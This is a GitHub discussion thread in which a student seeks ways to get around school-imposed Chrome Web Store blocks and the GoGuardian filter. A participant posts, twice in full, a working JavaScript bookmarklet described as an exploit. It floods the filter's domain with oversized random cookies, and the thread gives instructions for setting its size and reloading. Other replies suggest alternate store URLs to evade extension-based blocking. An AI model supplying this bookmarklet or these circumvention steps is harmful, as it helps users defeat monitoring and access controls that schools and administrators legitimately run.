### DISCUSSION TITLE
The Webstore Has Been Blocked

### DISCUSSION THREAD

**Discussion by Overreationary** [3kh0/ext-remover#495] [Help JOIN TITANIUM NETWORK TO SHARE PLEASE] [answered]
Is there any way to use these bookmarklets and have them work without having to go to chrome.google.com/webstorex because my school IT people are big-brained and just blocked the entire website, so now nothing works lol? Is there any other website I can deploy it on? I tried, but when I click soft disable, nothing happens. Thank you for your help in advance :)

**Comment by Aka-but-nice** [comment]
> Is there any way to use these bookmarklets and have them work without having to go to chrome.google.com/webstorex because my school IT people are big-brained and just blocked the entire website, so now nothing works lol? Is there any other website I can deploy it on? I tried, but when I click soft disable, nothing happens. Thank you for your help in advance :)

Did you try the new point blank on the webstore

**Comment by Overreationary** [comment]
ALL links related to the webstore are blocked.

**Reply by Aka-but-nice** [reply]
Yes, but did you try new point blank on webstore if so, you are doing it wrong, now a school block? Easy, a admin block? Not so, there's policies enforcing that block, you can't bypass it.

**Reply by Overreationary** [reply]
What Im asking though, is if there are any other pages I can run this bookmarklet on besides something on the webstore. They've blocked all things related to the webstore, and have blocked all install attempts related to it besides the ones enforced by the admin. So is there a different webpage to run it on that still works.

**Reply by Aka-but-nice** [reply]
No, only the webstore ironically has chrome.webstorePrivate, no other applications hold these permissions

**Reply by Aka-but-nice** [reply]
> ALL links related to the webstore are blocked.
> […](#)
> On Tue, Feb 7, 2023 at 7:09 PM Aka-unblock ***@***.***> wrote: Is there any way to use these bookmarklets and have them work without having to go to chrome.google.com/webstorex because my school IT people are big-brained and just blocked the entire website, so now nothing works lol? Is there any other website I can deploy it on? I tried, but when I click soft disable, nothing happens. Thank you for your help in advance :) Did you try the new point blank on the webstore — Reply to this email directly, view it on GitHub <[#495 (comment)](https://github.com/3kh0/ext-remover/discussions/495#discussioncomment-4899595)>, or unsubscribe <https://github.com/notifications/unsubscribe-auth/AWLHCDZCHY67GGO62L4P6ZTWWLW4ZANCNFSM6AAAAAAUTNQBXY> . You are receiving this because you authored the thread.Message ID: ***@***.***>

Well, you know you can use New Point Blank, it doesn't involve going to the webstore.

**Reply by Overreationary** [reply]
What do I do with that? do I just put in the extension I want it to turn on and off? It works, but it is super laggy, and non-reliable as well.

**Reply by Aka-but-nice** [reply]
> What do I do with that? do I just put in the extension I want it to turn on and off? It works, but it is super laggy, and non-reliable as well.

Not that one, please, state your extension/blocker that blocks sites.

**Reply by Overreationary** [reply]
Go Guardian

**Reply by Aka-but-nice** [reply]
Use the exploit that was recently discovered in TN.
First go to goguardian.com.
On that page run 


javascript:(e=>{for(var o=32*(parseInt(prompt("Size Multiplier","1"))||1),t=new Date(2e14).toUTCString(),n=location.hostname.split(".").slice(-2).join("."),r=0;r<100;r++)document.cookie=`cd${r}=${encodeURIComponent(btoa(String.fromCharCode.apply(0,crypto.getRandomValues(new Uint8Array(o))))).substring(0,o)};expires=${t};domain=${n};path=/`;alert("OK")})(); 


It will give a prompt asking for a size amount, put 99 in it, and reload, this was very much confirmed to work with securly, but they have not confirmed with goguardian, if this doesn't work, I am sorry.

**Reply by Aka-but-nice** [reply]
Just like discord, ok bookmark this code instead
```javascript:(e=>{for(var o=32*(parseInt(prompt("Size Multiplier","1"))||1),t=new Date(2e14).toUTCString(),n=location.hostname.split(".").slice(-2).join("."),r=0;r<100;r++)document.cookie=`cd${r}=${encodeURIComponent(btoa(String.fromCharCode.apply(0,crypto.getRandomValues(new Uint8Array(o))))).substring(0,o)};expires=${t};domain=${n};path=/`;alert("OK")})();```

**Reply by Overreationary** [reply]
It doesn't show the block page anymore, but it just shows 400 bad requests. I wonder if there is another number besides 99 that works, but I have very little knowledge of javascript, so imma leave it to the professionals lol.

**Comment by Undefined-cloud** [comment]
Use a alternate webstorex url like: chrome.google.com/webstorex.40572453234fdsa

**Reply by Aka-but-nice** [reply]
It wouldn't work, unless the webstore isn't admin blocked, and only blocked by an extension, if so, this may work.

**Reply by Undefined-cloud** [reply]
yeah i meant extensions, so yeah

**Comment by S-PScripts** [comment, marked as answer]
r
